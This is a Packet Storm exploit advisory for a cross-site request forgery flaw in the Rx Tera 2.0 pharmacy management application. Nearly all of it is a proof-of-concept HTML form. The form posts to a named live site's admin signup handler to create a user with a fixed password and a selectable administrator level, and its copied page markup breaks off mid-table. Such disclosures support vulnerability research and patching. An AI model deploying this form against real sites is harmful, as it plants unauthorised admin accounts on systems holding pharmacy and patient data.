Rx Tera 2.0 Cross Site Request Forgery

2018-01-09T00:00:00
ID PACKETSTORM:145757
Type packetstorm
Reporter indoushka
Modified 2018-01-09T00:00:00

Description

                                        
                                            `============================================================================================================================  
| # Title : Rx Tera 2.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # email : indoushka4ever@gmail.com |  
| # Tested on : windows 10 FranASSais V.(Pro) |  
| # Version : 2.0 |  
| # Vendor : https://codecanyon.net/item/rx-tera-complete-pharmacy-management-application/19227825 |   
| # Dork : n/a |  
============================================================================================================================  
  
poc :  
  
  
<div class="content-wrapper">  
<!-- Content Header (Page header) -->  
<section class="content-header">  
<h1>  
Add Users  
<small>Create new system users</small>  
</h1>  
<ol class="breadcrumb">  
<li><a href="index.php"><i class="fa fa-dashboard"></i> Home</a></li>  
<li><a href="index.php">Admin</a></li>  
<li class="active">Add Users</li>  
</ol>  
</section>  
  
<!-- Main content -->  
<section class="content">  
  
<!-- Default box -->  
  
<div class="box-body">  
<!-- general form elements -->  
<div class="box box-primary">  
<div class="box-header with-border">  
<h3 class="box-title">All Fields are required</h3>  
</div>  
<!-- /.box-header -->  
<!-- form start -->  
  
<form role="form" method="post" name='form1' action="http://www.jonarchpharmacy.com/admin/signupload.php" onsubmit="return validate()">  
<div class="box-body">  
<div class="form-group">  
<label for="exampleInputEmail1">Full Name</label>  
<input type="text" name="name" class="form-control" id="skills" placeholder="Enter Full Name" required>  
</div>  
<div class="form-group">  
<label for="exampleInputEmail1">System username</label>  
<input type="text" name="userid" class="form-control" id="checkleng" placeholder="Username must be 6 or more characters" required>  
</div>  
  
<div class="form-group">  
<label for="exampleInputEmail1">E-mail</label>  
<input type="text" name="mail" class="form-control" id="checkleng" placeholder="Enter your E-mail" required>  
</div>  
  
<div class="form-group">  
<label for="exampleInputEmail1">Password</label>  
<input type="text" name="password" class="form-control" id="exampleInputEmail1" value="pass123" readonly>  
</div>  
  
<div class="form-group">  
<label>Select user level (1 = Admin, 2 = Dispenser, 3 = Cashier)</label>  
<select name="level" class="form-control">  
<option>1</option>  
<option>2</option>  
<option>3</option>  
  
required</select>  
</div>  
<div>  
<button type="submit" name="register" class="btn btn-primary">Register</button>  
  
</div>  
</div>  
  
</form>  
  
  
  
  
<section class="content">  
<div class="row">  
<div class="col-xs-12">  
<div class="box">  
<div class="box-header">  
<h3 class="box-title">All system users</h3>  
</div>  
<!-- /.box-header -->  
<div class="box-body">  
<table id="example2" class="table table-bordered table-hover">  
<thead>  
<tr>  
<th>Full Name</th>  
<th>E-mail</th>  
<th>Username</th>  
<th>User Level</th>  
<th>Edit</th>  
<th>Delete</th>  
</tr>  
</thead>  
  
<tbody>  
  
  
Greetz :----------------------------------------------------------------------------------------  
|  
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |  
|  
================================================================================================  
`